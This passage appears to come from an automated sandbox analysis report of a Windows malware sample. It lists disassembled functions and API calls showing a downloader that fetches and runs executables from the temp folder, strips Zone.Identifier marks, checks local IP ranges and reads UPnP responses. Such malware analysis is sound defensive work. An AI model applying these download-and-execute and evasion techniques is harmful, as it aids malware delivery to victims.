                                                                          • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EDCA
                                                                          • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EDF9
                                                                          • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EE28
                                                                          • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EE5B
                                                                          • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 0040EE8C
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040EE9B
                                                                          • wsprintfW.USER32 ref: 0040EEB4
                                                                          • DeleteFileW.KERNELBASE(?), ref: 0040EEC4
                                                                          • Sleep.KERNELBASE(000003E8), ref: 0040EECF
                                                                          • Sleep.KERNEL32(000007D0), ref: 0040EEF0
                                                                          • ExitProcess.KERNEL32 ref: 0040EF18
                                                                          • DeleteFileW.KERNEL32(?), ref: 0040EF2E
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040EF3B
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040EF48
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040EF55
                                                                          • Sleep.KERNEL32(000003E8), ref: 0040EF60
                                                                          • rand.MSVCRT ref: 0040EF75
                                                                          • Sleep.KERNEL32 ref: 0040EF8C
                                                                          • rand.MSVCRT ref: 0040EF92
                                                                          • rand.MSVCRT ref: 0040EFA6
                                                                          • wsprintfW.USER32 ref: 0040EFCD
                                                                          • DeleteUrlCacheEntryW.WININET(?), ref: 0040EFDD
                                                                          • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040EFF7
                                                                          • wsprintfW.USER32 ref: 0040F017
                                                                          • DeleteFileW.KERNEL32(?), ref: 0040F027
                                                                          • Sleep.KERNEL32(000003E8), ref: 0040F032
                                                                          • Sleep.KERNEL32(000007D0), ref: 0040F053
                                                                          • ExitProcess.KERNEL32 ref: 0040F07A
                                                                          • DeleteFileW.KERNEL32(?), ref: 0040F089
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                          • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36$fs@
                                                                          • API String ID: 3526668077-4111046768
                                                                          • Opcode ID: c5988ea26b3bb92b178f5d74f81669c905be15f1af6d42834315cd531e57167b
                                                                          • Instruction ID: ad06c6bce1eeec4b269cf6b178fa0be949fbab599c126aebf23d2838ae6487db
                                                                          • Opcode Fuzzy Hash: c5988ea26b3bb92b178f5d74f81669c905be15f1af6d42834315cd531e57167b
                                                                          • Instruction Fuzzy Hash: 8291EBB1940318ABE720DB61DC49FEA3379BB88701F0484B9F209A51C1DAB99AD4CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 94 40b0e0-40b0f7 call 40b010 97 40b0f9 94->97 98 40b0fe-40b11a call 40ac60 strcmp 94->98 99 40b385-40b388 97->99 102 40b121-40b13d call 40ac60 strstr 98->102 103 40b11c 98->103 106 40b180-40b19c call 40ac60 strstr 102->106 107 40b13f-40b15b call 40ac60 strstr 102->107 103->99 114 40b19e-40b1ba call 40ac60 strstr 106->114 115 40b1df-40b1fb call 40ac60 strstr 106->115 112 40b17b 107->112 113 40b15d-40b179 call 40ac60 strstr 107->113 112->99 113->106 113->112 124 40b1da 114->124 125 40b1bc-40b1d8 call 40ac60 strstr 114->125 122 40b1fd-40b219 call 40ac60 strstr 115->122 123 40b23e-40b254 EnterCriticalSection 115->123 134 40b239 122->134 135 40b21b-40b237 call 40ac60 strstr 122->135 127 40b25f-40b268 123->127 124->99 125->115 125->124 130 40b299-40b2a4 call 40b390 127->130 131 40b26a-40b27a 127->131 143 40b37a-40b37f LeaveCriticalSection 130->143 144 40b2aa-40b2b8 130->144 136 40b297 131->136 137 40b27c-40b295 call 40d6e0 131->137 134->99 135->123 135->134 136->127 137->130 143->99 146 40b2ba 144->146 147 40b2be-40b2c0 call 409fd0 144->147 146->147 149 40b2c5-40b2cf 147->149 149->143 150 40b2d5-40b2f2 call 40d6e0 149->150 153 40b2f4-40b304 150->153 154 40b34a-40b362 150->154 156 40b310-40b348 call 40a3f0 153->156 157 40b306-40b30e Sleep 153->157 155 40b368-40b373 call 40b390 154->155 155->143 162 40b375 call 40adc0 155->162 156->155 157->153 162->143
                                                                          APIs
                                                                            • Part of subcall function 0040B010: gethostname.WS2_32(?,00000100), ref: 0040B02C
                                                                            • Part of subcall function 0040B010: gethostbyname.WS2_32(?), ref: 0040B03E
                                                                          • strcmp.NTDLL ref: 0040B110
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: gethostbynamegethostnamestrcmp
                                                                          • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                          • API String ID: 2906596889-2213908610
                                                                          • Opcode ID: ef46493d462c0015352365694cd622c9671cfbedd46860d756f0f998993e3d3d
                                                                          • Instruction ID: 14285435020103c943bf7af990fcf7992b9b4842fd13eaff794dfd4de82f65c2
                                                                          • Opcode Fuzzy Hash: ef46493d462c0015352365694cd622c9671cfbedd46860d756f0f998993e3d3d
                                                                          • Instruction Fuzzy Hash: 5061A3B5904304A7DB10EF65DC4AAAE3B74AB50348F14843AEC05773D2E73DEA54C69E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • memset.NTDLL ref: 00405838
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00405850
                                                                          • Sleep.KERNELBASE(00000001), ref: 00405864
                                                                          • GetTickCount.KERNEL32 ref: 0040586A
                                                                          • GetTickCount.KERNEL32 ref: 00405873
                                                                          • wsprintfW.USER32 ref: 00405886
                                                                          • RegisterClassExW.USER32(00000030), ref: 00405893
                                                                          • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
                                                                          • TranslateMessage.USER32(?), ref: 004058E5
                                                                          • DispatchMessageA.USER32(?), ref: 004058EF
                                                                          • ExitThread.KERNEL32 ref: 00405901
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                          • String ID: %x%X$0
                                                                          • API String ID: 716646876-225668902
                                                                          • Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                          • Instruction ID: b462c37bb5856212f40d891765093af4ebd6b4ddfa956f9ba6030597f9716a14
                                                                          • Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                          • Instruction Fuzzy Hash: 3B212F71940308BBEB10ABA0DC49FEE7B78EB04711F148439F605BA1D0DBB955948F69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 243 40ea00-40ea3f CreateFileW 244 40ea45-40ea60 CreateFileMappingW 243->244 245 40eb5a-40eb5e 243->245 246 40eb50-40eb54 CloseHandle 244->246 247 40ea66-40ea7f MapViewOfFile 244->247 248 40eb60-40eb80 CreateFileW 245->248 249 40ebb4-40ebba 245->249 246->245 250 40ea85-40ea9b GetFileSize 247->250 251 40eb46-40eb4a CloseHandle 247->251 252 40eb82-40eba2 WriteFile CloseHandle 248->252 253 40eba8-40ebb1 call 40a3f0 248->253 254 40eaa1-40eab4 call 40ca30 250->254 255 40eb3c-40eb40 UnmapViewOfFile 250->255 251->246 252->253 253->249 254->255 260 40eaba-40eac9 254->260 255->251 260->255 261 40eacb-40eaeb call 40c3d0 260->261 263 40eaf0-40eafa 261->263 263->255 264 40eafc-40eb27 call 40a720 memcmp 263->264 264->255 267 40eb29-40eb35 call 40a3f0 264->267 267->255
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040EA32
                                                                          • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040EA53
                                                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000), ref: 0040EA72
                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EA8B
                                                                          • memcmp.NTDLL ref: 0040EB1D
                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040EB40
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040EB4A
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040EB54
                                                                          • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EB73
                                                                          • WriteFile.KERNELBASE(000000FF,00000000,00000000,00000000,00000000), ref: 0040EB98
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040EBA2
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                          • String ID:
                                                                          • API String ID: 3902698870-0
                                                                          • Opcode ID: 625729bca970ea188e75b6ac59ea132eb9e050d626a68e670ae1dd538be4b74b
                                                                          • Instruction ID: 5fa72956d792c98bf49e98e2e31999c9ee619b8bc34dd7c72e15d09ac2df7f98
                                                                          • Opcode Fuzzy Hash: 625729bca970ea188e75b6ac59ea132eb9e050d626a68e670ae1dd538be4b74b
                                                                          • Instruction Fuzzy Hash: C2514EB5E40208FBDB14DFA4CC49FDEB774AB48704F108569E611B72C0D7B9AA45CB58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 294 40d510-40d540 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 295 40d546-40d55a InterlockedExchangeAdd 294->295 296 40d629-40d640 GetCurrentThread SetThreadPriority 294->296 295->296 297 40d560-40d569 295->297 298 40d56c-40d573 297->298 298->296 299 40d579-40d594 EnterCriticalSection 298->299 300 40d59f-40d5a7 299->300 301 40d5e7-40d5fc LeaveCriticalSection 300->301 302 40d5a9-40d5b6 300->302 305 40d607-40d60d 301->305 306 40d5fe-40d605 301->306 303 40d5c3-40d5e5 WaitForSingleObject 302->303 304 40d5b8-40d5c1 302->304 307 40d596-40d59c 303->307 304->307 308 40d61c-40d624 Sleep 305->308 309 40d60f-40d618 305->309 306->296 307->300 308->298 309->308 310 40d61a 309->310 310->296
                                                                          APIs
                                                                          • GetCurrentThread.KERNEL32 ref: 0040D516
                                                                          • GetThreadPriority.KERNEL32(00000000,?,?,?,00407D0E,021A0638,000000FF), ref: 0040D51D
                                                                          • GetCurrentThread.KERNEL32 ref: 0040D528
                                                                          • SetThreadPriority.KERNELBASE(00000000,?,?,?,00407D0E,021A0638,000000FF), ref: 0040D52F
                                                                          • InterlockedExchangeAdd.KERNEL32(00407D0E,00000000), ref: 0040D552
                                                                          • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D587
                                                                          • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D5D2
                                                                          • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D5EE
                                                                          • Sleep.KERNELBASE(00000001), ref: 0040D61E
                                                                          • GetCurrentThread.KERNEL32 ref: 0040D62D
                                                                          • SetThreadPriority.KERNEL32(00000000,?,?,?,00407D0E), ref: 0040D634
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                          • String ID:
                                                                          • API String ID: 3862671961-0
                                                                          • Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                          • Instruction ID: 00112f281c6e7fc3510a654903225a70fc6abbe47ad766b876a095a97212bdbe
                                                                          • Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                          • Instruction Fuzzy Hash: 64411C74E00209EFDB14CFE4D848BAEBBB5EF48305F108566E905A7380D7799A85CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • InitializeCriticalSection.KERNEL32(004176A8,?,?,?,?,?,?,00407C92), ref: 0040B50B
                                                                          • CreateFileW.KERNELBASE(C:\Users\user\tbtnds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B55D
                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B57E
                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B59D
                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B5B2
                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B618
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040B622
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040B62C
                                                                            • Part of subcall function 0040D6E0: NtQuerySystemTime.NTDLL(0040B5F5), ref: 0040D6EA
                                                                            • Part of subcall function 0040D6E0: RtlTimeToSecondsSince1980.NTDLL(0040B5F5,?), ref: 0040D6F8
                                                                          Strings
                                                                          • C:\Users\user\tbtnds.dat, xrefs: 0040B558
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                          • String ID: C:\Users\user\tbtnds.dat
                                                                          • API String ID: 439099756-681901067
                                                                          • Opcode ID: b077be6e4a9d01028eadd6adedd7d2846680c744cd7a084032a35666e1c91687
                                                                          • Instruction ID: 29fa8a612647d1d21a92a83f8fc84a43d263a312b3bcc6ad32b06dcb2fb765dc
                                                                          • Opcode Fuzzy Hash: b077be6e4a9d01028eadd6adedd7d2846680c744cd7a084032a35666e1c91687
                                                                          • Instruction Fuzzy Hash: 41413C74E40309BBDB10DFA4CC4ABAEB770EB44708F208569E611B72D1C7B96641CB9D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 357 405b60-405b92 InitializeCriticalSection CreateFileW 358 405c85-405c88 357->358 359 405b98-405bb3 CreateFileMappingW 357->359 360 405bb9-405bd2 MapViewOfFile 359->360 361 405c7b-405c7f CloseHandle 359->361 362 405c71-405c75 CloseHandle 360->362 363 405bd8-405bea GetFileSize 360->363 361->358 362->361 364 405bed-405bf1 363->364 365 405bf3-405bfa 364->365 366 405c67-405c6b UnmapViewOfFile 364->366 367 405bfc 365->367 368 405bfe-405c11 call 40ca60 365->368 366->362 367->366 371 405c13 368->371 372 405c15-405c2a 368->372 371->366 373 405c3a-405c65 call 405c90 372->373 374 405c2c-405c38 call 40a3f0 372->374 373->364 374->366
                                                                          APIs
                                                                          • InitializeCriticalSection.KERNEL32(00416C40,?,?,?,?,?,00407C5C), ref: 00405B6B
                                                                          • CreateFileW.KERNELBASE(C:\Users\user\tbtcmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407C5C), ref: 00405B85
                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405C75
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 00405C7F
                                                                          Strings
                                                                          • C:\Users\user\tbtcmds.dat, xrefs: 00405B80
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                          • String ID: C:\Users\user\tbtcmds.dat
                                                                          • API String ID: 3956458805-126538273
                                                                          • Opcode ID: 4a7cc75c1fcf6fb7aee4929f62d661ed4a6a37d9273678fc0e2124efc9c7db27
                                                                          • Instruction ID: fe22dcd5f9c76504c29afc9a33c71b71b278b318499f2180723d1a87b0050cb8
                                                                          • Opcode Fuzzy Hash: 4a7cc75c1fcf6fb7aee4929f62d661ed4a6a37d9273678fc0e2124efc9c7db27
                                                                          • Instruction Fuzzy Hash: 76311B74A40308EBEB14DBA4CD4AFAFB774EB44704F208569E601772D0D7B96A81CF99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 379 40ebc0-40ec20 memset * 2 CreateProcessW 380 40ec31-40ec55 ShellExecuteW 379->380 381 40ec22-40ec2f Sleep 379->381 383 40ec66 380->383 384 40ec57-40ec64 Sleep 380->384 382 40ec68-40ec6b 381->382 383->382 384->382
                                                                          APIs
                                                                          • memset.NTDLL ref: 0040EBCE
                                                                          • memset.NTDLL ref: 0040EBDE
                                                                          • CreateProcessW.KERNELBASE(00000000,0040F065,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EC17
                                                                          • Sleep.KERNELBASE(000003E8), ref: 0040EC27
                                                                          • ShellExecuteW.SHELL32(00000000,open,0040F065,00000000,00000000,00000000), ref: 0040EC42
                                                                          • Sleep.KERNEL32(000003E8), ref: 0040EC5C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                          • String ID: $D$open
                                                                          • API String ID: 3787208655-2182757814
                                                                          • Opcode ID: 3c17362cf3061ec7cce867e0b2926868dc4a4ed0f6c2d491f15d9c7bfa1c2f38
                                                                          • Instruction ID: 0351ccfd918ecb695d128b5eda6762ce2dd083b24a7fe2c71c98e7e13efc789c
                                                                          • Opcode Fuzzy Hash: 3c17362cf3061ec7cce867e0b2926868dc4a4ed0f6c2d491f15d9c7bfa1c2f38
                                                                          • Instruction Fuzzy Hash: FE114271A44308BBF710DB91DD46FDE7774AB14B00F104125F6057E2C1D6FA5A44C759
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 385 40dad0-40daea 386 40dafb-40db02 385->386 387 40dbb4-40dbbd 386->387 388 40db08-40db27 recvfrom 386->388 389 40db36-40db53 StrCmpNIA 388->389 390 40db29-40db34 Sleep 388->390 392 40db55-40db74 StrStrIA 389->392 393 40dbaf 389->393 391 40daec-40daf5 390->391 391->386 392->393 394 40db76-40dbad StrChrA call 40cae0 392->394 393->391 394->393
                                                                          APIs
                                                                          • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DB1E
                                                                          • Sleep.KERNELBASE(000003E8), ref: 0040DB2E
                                                                          • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DB4B
                                                                          • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DB61
                                                                          • StrChrA.SHLWAPI(?,0000000D), ref: 0040DB8E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleeprecvfrom
                                                                          • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                          • API String ID: 668330359-3973262388
                                                                          • Opcode ID: e015ad2410b45833169f487912bda9b410abab1e9ab3979957402fade9c208bb
                                                                          • Instruction ID: 994a5b39e446e5258177b8a9e706ad28fc86481e8e9e2fe7090657293928531c
                                                                          • Opcode Fuzzy Hash: e015ad2410b45833169f487912bda9b410abab1e9ab3979957402fade9c208bb
                                                                          • Instruction Fuzzy Hash: 3A2151B0D44218ABDB20DB64DC45BE97774AB04308F1486E9E719B72C0C6B95ACACF5C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 397 40ec70-40ec94 InternetOpenA 398 40ec96-40ecb3 InternetOpenUrlA 397->398 399 40ed08-40ed19 Sleep 397->399 400 40ecb5-40ecdc HttpQueryInfoA 398->400 401 40ecfe-40ed02 InternetCloseHandle 398->401 402 40ecf4-40ecf8 InternetCloseHandle 400->402 403 40ecde-40ece6 400->403 401->399 402->401 403->402 404 40ece8-40ecf0 403->404 404->402
                                                                          APIs
                                                                          • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EC87
                                                                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040ECA6
                                                                          • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040ECCF
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040ECF8
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040ED02
                                                                          • Sleep.KERNELBASE(000003E8), ref: 0040ED0D
                                                                          Strings
                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EC82
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                          • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                          • API String ID: 2743515581-2272513262
                                                                          • Opcode ID: 5ec0293591b024498722aefa6d6b6499534c9d8093b9b534ce5668c941633b32
                                                                          • Instruction ID: 7e4e1c9f171caca0646539a3bded0a22de56d1af13d1156f275757e23962dbb7
                                                                          • Opcode Fuzzy Hash: 5ec0293591b024498722aefa6d6b6499534c9d8093b9b534ce5668c941633b32
